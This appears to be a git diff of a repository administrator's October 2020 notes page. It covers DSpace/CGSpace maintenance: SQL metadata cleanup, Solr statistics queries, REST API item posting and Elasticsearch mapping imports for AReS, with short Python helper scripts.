    dspace=# BEGIN;
     BEGIN
    -dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
    +dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
     DELETE 12
     dspace=# COMMIT;
     
      @@ -573,23 +573,23 @@ dspace=# COMMIT;
    ...
    -item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
    -item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
    +item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
    +item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
     ...
     solr_query_params = {
    -    "q": f"id:({item_ids_str})",
    -    "fq": "type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]",
    -    "facet": "true",
    -    "facet.field": "id",
    -    "facet.mincount": 1,
    -    "facet.limit": 1,
    -    "facet.offset": 0,
    -    "stats": "true",
    -    "stats.field": "id",
    -    "stats.calcdistinct": "true",
    -    "shards": shards,
    -    "rows": 0,
    -    "wt": "json",
    +    "q": f"id:({item_ids_str})",
    +    "fq": "type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]",
    +    "facet": "true",
    +    "facet.field": "id",
    +    "facet.mincount": 1,
    +    "facet.limit": 1,
    +    "facet.offset": 0,
    +    "stats": "true",
    +    "stats.field": "id",
    +    "stats.calcdistinct": "true",
    +    "shards": shards,
    +    "rows": 0,
    +    "wt": "json",
     }
     
    • The date range format for Solr is important, but it seems we only need to add T00:00:00Z to the normal ISO 8601 YYYY-MM-DD strings
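
A small sketch of that conversion, assuming plain `YYYY-MM-DD` inputs. The helper name `solr_date_range` is hypothetical:

```python
from datetime import date


def solr_date_range(start: str, end: str) -> str:
    """Build a Solr range expression from two YYYY-MM-DD strings."""
    # date.fromisoformat raises ValueError on malformed input, which acts
    # as a cheap validation step before the string reaches Solr
    start_day = date.fromisoformat(start)
    end_day = date.fromisoformat(end)
    return f"[{start_day.isoformat()}T00:00:00Z TO {end_day.isoformat()}T00:00:00Z]"


# Reproduces the range used in the fq parameter above
print("time:" + solr_date_range("2020-01-01", "2020-09-02"))
```

Parsing the dates first means a typo such as `2020-13-01` fails early in Python instead of producing a Solr error later.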
    • @@ -600,61 +600,61 @@ solr_query_params = {
    $ curl -s -d @request.json https://dspacetest.cgiar.org/rest/statistics/items | json_pp
     {
    -   "currentPage" : 0,
    -   "limit" : 10,
    -   "statistics" : [
    +   "currentPage" : 0,
    +   "limit" : 10,
    +   "statistics" : [
           {
    -         "downloads" : 3329,
    -         "id" : "b2c1bbfd-65b0-438c-9e49-d271c49b2696",
    -         "views" : 1565
    +         "downloads" : 3329,
    +         "id" : "b2c1bbfd-65b0-438c-9e49-d271c49b2696",
    +         "views" : 1565
           },
           {
    -         "downloads" : 3797,
    -         "id" : "f44cf173-2344-4eb2-8f00-ee55df32c76f",
    -         "views" : 48
    +         "downloads" : 3797,
    +         "id" : "f44cf173-2344-4eb2-8f00-ee55df32c76f",
    +         "views" : 48
           },
           {
    -         "downloads" : 11064,
    -         "id" : "8542f9da-9ce1-4614-abf4-f2e3fdb4b305",
    -         "views" : 26
    +         "downloads" : 11064,
    +         "id" : "8542f9da-9ce1-4614-abf4-f2e3fdb4b305",
    +         "views" : 26
           },
           {
    -         "downloads" : 6782,
    -         "id" : "2324aa41-e9de-4a2b-bc36-16241464683e",
    -         "views" : 19
    +         "downloads" : 6782,
    +         "id" : "2324aa41-e9de-4a2b-bc36-16241464683e",
    +         "views" : 19
           },
           {
    -         "downloads" : 48,
    -         "id" : "0fe573e7-042a-4240-a4d9-753b61233908",
    -         "views" : 12
    +         "downloads" : 48,
    +         "id" : "0fe573e7-042a-4240-a4d9-753b61233908",
    +         "views" : 12
           },
           {
    -         "downloads" : 0,
    -         "id" : "000e61ca-695d-43e5-9ab8-1f3fd7a67a32",
    -         "views" : 4
    +         "downloads" : 0,
    +         "id" : "000e61ca-695d-43e5-9ab8-1f3fd7a67a32",
    +         "views" : 4
           },
           {
    -         "downloads" : 0,
    -         "id" : "000dc7cd-9485-424b-8ecf-78002613cc87",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000dc7cd-9485-424b-8ecf-78002613cc87",
    +         "views" : 1
           },
           {
    -         "downloads" : 0,
    -         "id" : "000e1616-3901-4431-80b1-c6bc67312d8c",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000e1616-3901-4431-80b1-c6bc67312d8c",
    +         "views" : 1
           },
           {
    -         "downloads" : 0,
    -         "id" : "000ea897-5557-49c7-9f54-9fa192c0f83b",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000ea897-5557-49c7-9f54-9fa192c0f83b",
    +         "views" : 1
           },
           {
    -         "downloads" : 0,
    -         "id" : "000ec427-97e5-4766-85a5-e8dd62199ab5",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000ec427-97e5-4766-85a5-e8dd62199ab5",
    +         "views" : 1
           }
        ],
    -   "totalPages" : 13
    +   "totalPages" : 13
     }
     
    • I deployed it on DSpace Test and sent a note to Salem so he can test it
    • diff --git a/docs/2020-10/index.html b/docs/2020-10/index.html index dcf7db1c7..9dd63e52a 100644 --- a/docs/2020-10/index.html +++ b/docs/2020-10/index.html @@ -44,7 +44,7 @@ During the FlywayDB migration I got an error: "/> - + @@ -144,10 +144,10 @@ During the FlywayDB migration I got an error:
    -
    2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
    +
    2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
       Detail: Key (short_description)=(EPUB) already exists.  Call getNextException to see other errors in the batch.
     2020-10-06 21:36:04,138 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: 23505
    -2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
    +2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
       Detail: Key (short_description)=(EPUB) already exists.
     2020-10-06 21:36:04,142 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [could not execute batch]
     2020-10-06 21:36:04,143 ERROR org.dspace.storage.rdbms.DatabaseRegistryUpdater @ Error attempting to update Bitstream Format and/or Metadata Registries
    @@ -233,7 +233,7 @@ New item: aff5e78d-87c9-438d-94f8-1050b649961c (10568/108548)
      + Added   (dc.title): Testing CUA import NPE
     Tue Oct 06 22:06:14 CEST 2020 | Query:containerItem:aff5e78d-87c9-438d-94f8-1050b649961c
     Error while updating
    -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/solr/update] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.104</h3></body></html>
    +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/solr/update] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.104</h3></body></html>
             at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:512)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
    @@ -278,7 +278,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected m
     
     
     
    -
    $ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
    +
    $ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
     $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE
     
    • Then we post an item in JSON format to /rest/collections/{uuid}/items:
    • @@ -287,25 +287,25 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
    • Format of JSON is:
    -
    { "metadata": [
    +
    { "metadata": [
         {
    -      "key": "dc.title",
    -      "value": "Testing REST API post",
    -      "language": "en_US"
    +      "key": "dc.title",
    +      "value": "Testing REST API post",
    +      "language": "en_US"
         },
         {
    -      "key": "dc.contributor.author",
    -      "value": "Orth, Alan",
    -      "language": "en_US"
    +      "key": "dc.contributor.author",
    +      "value": "Orth, Alan",
    +      "language": "en_US"
         },
         {
    -      "key": "dc.date.issued",
    -      "value": "2020-09-01",
    -      "language": "en_US"
    +      "key": "dc.date.issued",
    +      "value": "2020-09-01",
    +      "language": "en_US"
         }
       ],
    -  "archived":"false",
    -  "withdrawn":"false"
    +  "archived":"false",
    +  "withdrawn":"false"
     }
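
As an illustration, an object in this format could be generated in Python rather than written by hand. This sketch only builds and prints the JSON; the function name `build_item_payload` is hypothetical and nothing is sent to the REST API:

```python
import json


def build_item_payload(fields, language="en_US"):
    """Build an item object in the format shown above.

    fields is a list of (key, value) pairs such as ("dc.title", "Some title").
    """
    metadata = [
        {"key": key, "value": value, "language": language}
        for key, value in fields
    ]
    # The archived and withdrawn flags are strings, as in the example above
    return {"metadata": metadata, "archived": "false", "withdrawn": "false"}


payload = build_item_payload(
    [
        ("dc.title", "Testing REST API post"),
        ("dc.contributor.author", "Orth, Alan"),
        ("dc.date.issued", "2020-09-01"),
    ]
)
print(json.dumps(payload, indent=2))
```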
     
    • What is unclear to me is the archived parameter, it seems to do nothing… perhaps it is only used for the /items endpoint when printing information about an item @@ -362,7 +362,7 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
    -
    $ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
    +
    $ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
     $ http http://localhost:8080/rest/status rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099
     $ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099 < item-object.json
     
      @@ -408,10 +408,10 @@ $ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:
    -
    $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    -$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    -$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    -$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +
    $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
     
    • After a few minutes I saw these four hits in Solr… WTF
        @@ -483,7 +483,7 @@ dspace=> COMMIT;
    -
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.country" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
    +
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.country" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
     COPY 195
     
    • Then use OpenRefine and make a new column for corrections, then use this GREL to convert to title case: value.toTitlecase() @@ -493,7 +493,7 @@ COPY 195
    • For the input forms I found out how to do a complicated search and replace in vim:
    -
    :'<,'>s/\<\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\>/\u\2\L\3/g
    +
    :'<,'>s/\<\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\>/\u\2\L\3/g
     
    • It uses a negative lookahead (one of the “lookaround” assertions in PCRE terms) to match words that do not begin with “pair”, “displayed”, etc., because we don’t want to edit the XML tags themselves…
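
A rough Python equivalent of that substitution, offered as a sketch rather than a drop-in replacement for the vim command. It assumes the input forms use `displayed-value` and `stored-value` tags, and the function name `title_case_values` is hypothetical:

```python
import re

# \b anchors at the start of a word; the negative lookahead rejects words
# that begin with a protected name, so the XML tag names stay untouched
WORD_PATTERN = re.compile(r"\b(?!pair|displayed|stored|value|AND)(\w)(\w*)\b")


def title_case_values(text):
    """Uppercase the first letter and lowercase the rest of each matched word."""
    return WORD_PATTERN.sub(
        lambda match: match.group(1).upper() + match.group(2).lower(), text
    )


print(title_case_values("<displayed-value>SOUTH AFRICA</displayed-value>"))
```

As in the vim pattern, "AND" is in the exclusion list, so it is left exactly as written in the input.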
        @@ -509,14 +509,14 @@ COPY 195
    -
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.region" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
    +
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.region" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
     COPY 34
     
    • I did the same as the countries in OpenRefine for the database values and in vim for the input forms
    • After testing the replacements locally I ran them on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
    -$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
    +
    $ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
    +$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
     
    • Then I started a full re-indexing:
    @@ -583,14 +583,14 @@ sys 2m22.713s dspace=> UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57; UPDATE 335063 dspace=> COMMIT; -dspace=> \COPY (SELECT DISTINCT text_value as "dc.subject", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY "dc.subject" ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER; +dspace=> \COPY (SELECT DISTINCT text_value as "dc.subject", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY "dc.subject" ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER; COPY 1500
    • Use my agrovoc-lookup.py script to validate subject terms against the AGROVOC REST API, extract matches with csvgrep, and then update and format the controlled vocabulary:
    $ csvcut -c 1 /tmp/2020-10-15-top-1500-agrovoc-subject.csv | tail -n 1500 > /tmp/subjects.txt
     $ ./agrovoc-lookup.py -i /tmp/subjects.txt -o /tmp/subjects.csv -d
    -$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' > dspace/config/controlled-vocabularies/dc-subject.xml
    +$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' > dspace/config/controlled-vocabularies/dc-subject.xml
     # apply formatting in XML file
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
     
      @@ -614,7 +614,7 @@ sys 2m22.713s
    • They are using the user agent “CCAFS Website Publications importer BOT” so they are getting rate limited by nginx
    • Ideally they would use the REST find-by-metadata-field endpoint, but it is really slow for large result sets (like twenty minutes!):
    -
    $ curl -f -H "CCAFS Website Publications importer BOT" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100" -d '{"key":"cg.contributor.crp", "value":"Climate Change, Agriculture and Food Security","language": "en_US"}'
    +
    $ curl -f -H "CCAFS Website Publications importer BOT" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100" -d '{"key":"cg.contributor.crp", "value":"Climate Change, Agriculture and Food Security","language": "en_US"}'
     
    • For now I will whitelist their user agent so that they can continue scraping /browse
    • I figured out that the mappings for AReS are stored in Elasticsearch @@ -624,23 +624,23 @@ sys 2m22.713s
    -
    $ curl -XPOST "localhost:9200/openrxv-values/_delete_by_query" -H 'Content-Type: application/json' -d'
    +
    $ curl -XPOST "localhost:9200/openrxv-values/_delete_by_query" -H 'Content-Type: application/json' -d'
     {
    -  "query": {
    -    "match": {
    -      "_id": "64j_THMBiwiQ-PKfCSlI"
    +  "query": {
    +    "match": {
    +      "_id": "64j_THMBiwiQ-PKfCSlI"
         }
       }
     }
     
    • I added a new find/replace:
    -
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
    +
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
     {
    -  "find": "ALAN1",
    -  "replace": "ALAN2",
    +  "find": "ALAN1",
    +  "replace": "ALAN2",
     }
    -'
    +'
     
    • I see it in Kibana, and I can search it in Elasticsearch, but I don’t see it in OpenRXV’s mapping values dashboard
    • Now I deleted everything in the openrxv-values index:
    • @@ -649,12 +649,12 @@ sys 2m22.713s
    • Then I tried posting it again:
    -
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
    +
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
     {
    -  "find": "ALAN1",
    -  "replace": "ALAN2",
    +  "find": "ALAN1",
    +  "replace": "ALAN2",
     }
    -'
    +'
     
    • But I still don’t see it in AReS
    • Interesting! I added a find/replace manually in AReS and now I see the one I POSTed…
    • @@ -683,63 +683,63 @@ sys 2m22.713s
    • Last night I learned how to POST mappings to Elasticsearch for AReS:
    $ curl -XDELETE http://localhost:9200/openrxv-values
    -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @./mapping.json
    +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @./mapping.json
     
    • The JSON file looks like this, with one instruction on each line:
    -
    {"index":{}}
    -{ "find": "CRP on Dryland Systems - DS", "replace": "Dryland Systems" }
    -{"index":{}}
    -{ "find": "FISH", "replace": "Fish" }
    +
    {"index":{}}
    +{ "find": "CRP on Dryland Systems - DS", "replace": "Dryland Systems" }
    +{"index":{}}
    +{ "find": "FISH", "replace": "Fish" }
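As a rough sketch of how a file in this format could be produced, the following Python pairs each find/replace document with an `{"index":{}}` action line. The `to_bulk_lines` and `to_bulk_body` helpers are hypothetical names used for illustration, and the input is assumed to be a plain dictionary of find to replace strings.

```python
import json


def to_bulk_lines(mappings):
    """Yield Bulk API lines: an action line, then the document it applies to."""
    for find, replace in mappings.items():
        yield '{"index":{}}'
        yield json.dumps({"find": find, "replace": replace})


def to_bulk_body(mappings):
    # The Bulk API takes newline-delimited JSON and the body must end with a newline
    return "\n".join(to_bulk_lines(mappings)) + "\n"


if __name__ == "__main__":
    print(to_bulk_body({"CRP on Dryland Systems - DS": "Dryland Systems", "FISH": "Fish"}), end="")
```

The output can be saved to a file and passed to curl with `--data-binary`, which keeps the newlines intact.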
     
    • Adjust the report templates on AReS based on some of Peter’s feedback
    • I wrote a quick Python script to filter and convert the old AReS mappings to Elasticsearch’s Bulk API format:
    -
    #!/usr/bin/env python3
    -
    -import json
    -import re
    -
    -f = open('/tmp/mapping.json', 'r')
    -data = json.load(f)
    -
    -# Iterate over old mapping file, which is in format "find": "replace", ie:
    -#
    -#   "alan": "ALAN"
    -#
    -# And convert to proper dictionaries for import into Elasticsearch's Bulk API:
    -#
    -#   { "find": "alan", "replace": "ALAN" }
    -#
    -for find, replace in data.items():
    -    # Skip all upper and all lower case strings because they are indicative of
    -    # some AGROVOC or other mappings we no longer want to do
    -    if find.isupper() or find.islower() or replace.isupper() or replace.islower():
    -        continue
    -
    -    # Skip replacements with acronyms like:
    -    #
    -    #   International Livestock Research Institute - ILRI
    -    #
    -    acronym_pattern = re.compile(r"[A-Z]+$")
    -    acronym_pattern_match = acronym_pattern.search(replace)
    -    if acronym_pattern_match is not None:
    -        continue
    -
    -    mapping = { "find": find, "replace": replace }
    -
    -    # Print command for Elasticsearch
    -    print('{"index":{}}')
    -    print(json.dumps(mapping))
    -
    -f.close()
    -
      +
      #!/usr/bin/env python3
      +
      +import json
      +import re
      +
      +f = open('/tmp/mapping.json', 'r')
      +data = json.load(f)
      +
      +# Iterate over old mapping file, which is in format "find": "replace", ie:
      +#
      +#   "alan": "ALAN"
      +#
      +# And convert to proper dictionaries for import into Elasticsearch's Bulk API:
      +#
      +#   { "find": "alan", "replace": "ALAN" }
      +#
      +for find, replace in data.items():
      +    # Skip all upper and all lower case strings because they are indicative of
      +    # some AGROVOC or other mappings we no longer want to do
      +    if find.isupper() or find.islower() or replace.isupper() or replace.islower():
      +        continue
      +
      +    # Skip replacements with acronyms like:
      +    #
      +    #   International Livestock Research Institute - ILRI
      +    #
      +    acronym_pattern = re.compile(r"[A-Z]+$")
      +    acronym_pattern_match = acronym_pattern.search(replace)
      +    if acronym_pattern_match is not None:
      +        continue
      +
      +    mapping = { "find": find, "replace": replace }
      +
      +    # Print command for Elasticsearch
      +    print('{"index":{}}')
      +    print(json.dumps(mapping))
      +
      +f.close()
      +
      • It filters all upper and lower case strings as well as any replacements that end in an acronym like “- ILRI”, reducing the number of mappings from around 4,000 to about 900
      • I deleted the existing openrxv-values Elasticsearch core and then POSTed it:
      $ ./convert-mapping.py > /tmp/elastic-mappings.txt
       $ curl -XDELETE http://localhost:9200/openrxv-values
      -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elastic-mappings.txt
      +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elastic-mappings.txt
       
      • Then in AReS I didn’t see the mappings in the dashboard until I added a new one manually, after which they all appeared
          @@ -762,12 +762,12 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-T
        • I ran the dspace cleanup -v process on CGSpace and got an error:
        -
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        -  Detail: Key (bitstream_id)=(192921) is still referenced from table "bundle".
        +
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        +  Detail: Key (bitstream_id)=(192921) is still referenced from table "bundle".
         
        • The solution is, as always:
        -
        $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
        +
        $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
         UPDATE 1
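Since this error comes up repeatedly, the fix could be generated from the error text itself. The following is a minimal sketch under the assumption that the error always has the `Key (bitstream_id)=(…)` form shown above; the `build_fix` helper is hypothetical and only builds the SQL string, it does not run anything against the database.

```python
import re

# Matches the "Detail:" line of the foreign key error and captures the ID
KEY_PATTERN = re.compile(r"Key \(bitstream_id\)=\((\d+)\)")


def build_fix(error_text):
    """Return the UPDATE statement for all bitstream IDs found, or None."""
    ids = sorted({int(i) for i in KEY_PATTERN.findall(error_text)})
    if not ids:
        return None
    id_list = ", ".join(str(i) for i in ids)
    return (
        "update bundle set primary_bitstream_id=NULL "
        f"where primary_bitstream_id in ({id_list});"
    )


if __name__ == "__main__":
    error = 'Detail: Key (bitstream_id)=(192921) is still referenced from table "bundle".'
    print(build_fix(error))
```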
         
        • After looking at the CGSpace Solr stats for 2020-10 I found some hits to purge:
        • @@ -794,8 +794,8 @@ Total number of bot hits purged: 8174
      -
      $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
      -$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
      +
      $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
      +$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
       
      • And I saw three hits in Solr with isBot: true!!!
          @@ -817,9 +817,9 @@ $ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
       $ dspace metadata-export -f /tmp/cgspace.csv
      -$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
      +$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
       
      • Then I went through all center subjects looking for “WOMEN” or “GENDER” and checking if they were missing the associated AGROVOC subject
          @@ -848,7 +848,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
      -
      $ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&size=10000&q=*:*' > /tmp/affiliations.json
      +
      $ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&size=10000&q=*:*' > /tmp/affiliations.json
       
      • Then I decided to try a different approach and I adjusted my convert-mapping.py script to re-consider some replacement patterns with acronyms from the original AReS mapping.json file to hopefully address some MEL to CGSpace mappings
